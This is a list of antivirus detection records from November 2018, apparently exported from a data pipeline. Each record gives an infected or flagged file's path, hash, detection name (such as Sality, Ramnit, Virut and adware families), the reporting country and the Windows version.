  Row(detection=Row(filename='a0012105.exe', filepath='h:\\system volume information\\_restore{d91319e2-a444-4f72-ae88-de668da52f71}\\rp2\\A0012105.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='ac3ad7f61f6dc403b5f27868d83c18089121ab71f92f18e1144cbba694fce2c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:41:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0010943.exe', filepath='h:\\system volume information\\_restore{d91319e2-a444-4f72-ae88-de668da52f71}\\rp2\\A0010943.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='ac3ad7f61f6dc403b5f27868d83c18089121ab71f92f18e1144cbba694fce2c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:39:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0012268.exe', filepath='h:\\system volume information\\_restore{d91319e2-a444-4f72-ae88-de668da52f71}\\rp2\\A0012268.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='ac3ad7f61f6dc403b5f27868d83c18089121ab71f92f18e1144cbba694fce2c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:42:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ac422967f227c1a312ce1b2f61eb45d976ba7e14c60568cb3844e029922b3804', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\AC422967F227C1A312CE1B2F61EB45D976BA7E14C60568CB3844E029922B3804', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='ac422967f227c1a312ce1b2f61eb45d976ba7e14c60568cb3844e029922b3804', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T12:34:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135956-9c2dcb13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68715a38\\AVSCAN-20181104-132010-5D814B12\\AVSCAN-20181104-135956-9C2DCB13', filesize=704000, name='HEUR/AGEN.1032303.#M1.#R1'), hash='ad4b8d07fc313462591aa91bede2f414c2be3e9c45341cfd5d31343a6ce5d375', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:00:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\Program Files (x86)\\csduragi\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='ad6085ca76f8437f036c994f75b3532ffedbb8d8eb2548e43c3b0f7d644e50d0', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T15:35:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0159191.exe', filepath='h:\\system volume information\\_restore{fc27124f-d585-4898-9a22-0cd8deaa1a71}\\rp164\\A0159191.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='ad66a8227861a437437b0dbdc49c0fce8009d51425aadd71505accb2aae7d13c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:41:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152500-c8bdb048', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_436779a9\\AVSCAN-20181104-151638-82CFE55F\\AVSCAN-20181104-152500-C8BDB048', filesize=1088000, name='Adware/Wajam.aib.#M1.#R1'), hash='ad834f39ca2de4a1dbf53ec217e7479e1b689ffbd2ac2f209257b7a437b4d971', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:25:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ade012c4275bb7ed3281760e03b3de2e2bcd53e2b81361f68a3a45f4363b7d1c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\ADE012C4275BB7ED3281760E03B3DE2E2BCD53E2B81361F68A3A45F4363B7D1C', filesize=2560000, name='Worm/Ngrbot.adwm.#M1.#R1'), hash='ade012c4275bb7ed3281760e03b3de2e2bcd53e2b81361f68a3a45f4363b7d1c', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:13:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='baixaki_windows-movie-maker.exe', filepath='C:\\Users\\X\\Downloads\\Baixaki_windows-movie-maker.exe', filesize=1864000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='ae678786357f7cdffbc206a0055301e9703926fc28c49cdbe6d009cab4f8c8e2', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T14:42:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='baixaki_windows-movie-maker (1).exe', filepath='C:\\Users\\X\\Downloads\\Baixaki_windows-movie-maker (1).exe', filesize=1864000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='ae678786357f7cdffbc206a0055301e9703926fc28c49cdbe6d009cab4f8c8e2', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T14:42:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124430-88039144', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_61cd44c7\\AVSCAN-20181104-124308-763F0A28\\AVSCAN-20181104-124430-88039144', filesize=1864000, name='PUA/InstallCore.Gen.#M1.#R1'), hash='ae678786357f7cdffbc206a0055301e9703926fc28c49cdbe6d009cab4f8c8e2', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:44:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124423-86650032', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_61cd44c7\\AVSCAN-20181104-124308-763F0A28\\AVSCAN-20181104-124423-86650032', filesize=1864000, name='PUA/InstallCore.Gen.#M1.#R1'), hash='ae678786357f7cdffbc206a0055301e9703926fc28c49cdbe6d009cab4f8c8e2', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:44:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-170111-af7e804d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bd9041\\AVSCAN-20181102-205516-13298918\\AVSCAN-20181104-170111-AF7E804D', filesize=64000, name='Worm/Gamarue.ioemn.#M1.#R1'), hash='ae7c7060def3562a3d78ad8a933c1ce4ecb75263a315be7a9b62d038edb685df', metadata=Row(cmdline=None, country='ME', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:57:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-114942-4837c0d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68da91b9\\AVSCAN-20181104-114756-39602EE4\\AVSCAN-20181104-114942-4837C0D0', filesize=10304000, name='Adware/Adware.543562.#M1.#R1'), hash='aeaaa560e95d54a6ed2392d59898f295f6e9368bc9b8c1d8f537b79f4c3dc798', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T06:18:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ytdsetup.exe', filepath='F:\\\xa0\\YTDSetup.exe', filesize=10304000, name='Adware/Adware.543562.#M1.#R1'), hash='aeaaa560e95d54a6ed2392d59898f295f6e9368bc9b8c1d8f537b79f4c3dc798', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4848960, timestamp='2018-11-04T06:14:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ytdsetup.exe', filepath='F:\\\xa0\\YTDSetup.exe', filesize=10304000, name='Adware/Adware.543562.#M1.#R1'), hash='aeaaa560e95d54a6ed2392d59898f295f6e9368bc9b8c1d8f537b79f4c3dc798', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4848960, timestamp='2018-11-04T06:14:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='af2d5b939fe28fb9cba8536cf9a07f753fac6e2ca0dada4d70cceab647f286be', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\AF2D5B939FE28FB9CBA8536CF9A07F753FAC6E2CA0DADA4D70CCEAB647F286BE', filesize=256000, name='TR/Crypt.XPACK.Gen.#M300.#R544'), hash='af2d5b939fe28fb9cba8536cf9a07f753fac6e2ca0dada4d70cceab647f286be', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:45:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000085a1', filepath='C:\\Windows\\Temp\\5d4c655f-7a2a-4f9d-a12c-bb8d18e7cc2c\\tmp00000551\\tmp000085a1', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='af662cc958e2e2a8311f3b9308fa5f2815b8240f1ac74c1ed23e416f8adcd80d', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.3.915.11577\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T11:08:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='af72b66b2f660b297ba6c87cb99002509dfbd19e8bf9a9b09b9005e89c1b3a41', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\AF72B66B2F660B297BA6C87CB99002509DFBD19E8BF9A9B09B9005E89C1B3A41', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='af72b66b2f660b297ba6c87cb99002509dfbd19e8bf9a9b09b9005e89c1b3a41', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:51:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rtmpdump.exe', filepath='\\\\?\\C:\\Program Files (x86)\\DsNET Corp\\aTube Catcher 2.0\\rtmpdump.exe', filesize=384000, name='W32/Neshta.A.#M1.#R1'), hash='afee537dda8689f04666b5ce7f6d00d0ccabddd0649b782d4a91726e519bd02e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='quyet dinh gs.exe', filepath='F:\\bi thư\\GS Mạnh\\Quyet dinh GS.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='b0016b84d51f5139cbfc80f308cd1a1959903a346e07de97ef71810dfc809077', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:44:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b0469e6812e239a47caef5a5e475244e2d101c572bedfdebad412bb855409143', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B0469E6812E239A47CAEF5A5E475244E2D101C572BEDFDEBAD412BB855409143', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b0469e6812e239a47caef5a5e475244e2d101c572bedfdebad412bb855409143', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T14:12:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='C:\\Program Files\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='b05f7dfc5bbaf271f275eadc3290a47d0dae3335960c819f119bdc85ce1ca73f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:vu+xcyCxT0ePamJH.1', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-04T09:25:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185207-eadc15c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-185207-EADC15C5', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:52:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201538-8848965a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-201538-8848965A', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:15:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201518-8591fa35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-201518-8591FA35', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:15:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205049-a238a9df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-205049-A238A9DF', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:50:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-233401-aad35b5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-233401-AAD35B5F', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:34:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-182514-89a05a97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-182514-89A05A97', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T17:25:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184207-9ac035e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184207-9AC035E1', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:42:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203933-1e7ab2ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-203933-1E7AB2AC', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:39:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184943-d7a4a427', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184943-D7A4A427', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:49:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202959-fb4415a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202959-FB4415A5', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:29:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205320-b65d8092', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-205320-B65D8092', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:53:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205338-b8ceafdb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-205338-B8CEAFDB', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:53:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202059-b32f87d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202059-B32F87D9', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:20:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204224-5ed3b10f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204224-5ED3B10F', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:42:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202046-b15664d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202046-B15664D0', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:20:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204702-7c307869', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-204702-7C307869', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:47:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190702-95cdd107', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-190702-95CDD107', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:07:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202504-d3e4929a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202504-D3E4929A', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:25:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202521-d624fe6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202521-D624FE6D', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:25:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205420-be60b5be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-205420-BE60B5BE', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:54:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203527-eaee5c46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-203527-EAEE5C46', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:35:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203455-22c342c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-203455-22C342C3', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:34:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203431-df5663a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-203431-DF5663A7', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:34:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204620-7e53310f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204620-7E53310F', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:46:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185048-e05081d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-185048-E05081D0', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:50:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184613-bb983a3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184613-BB983A3B', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:46:10Z'), dt=datetime.date(2018, 11, 4)),
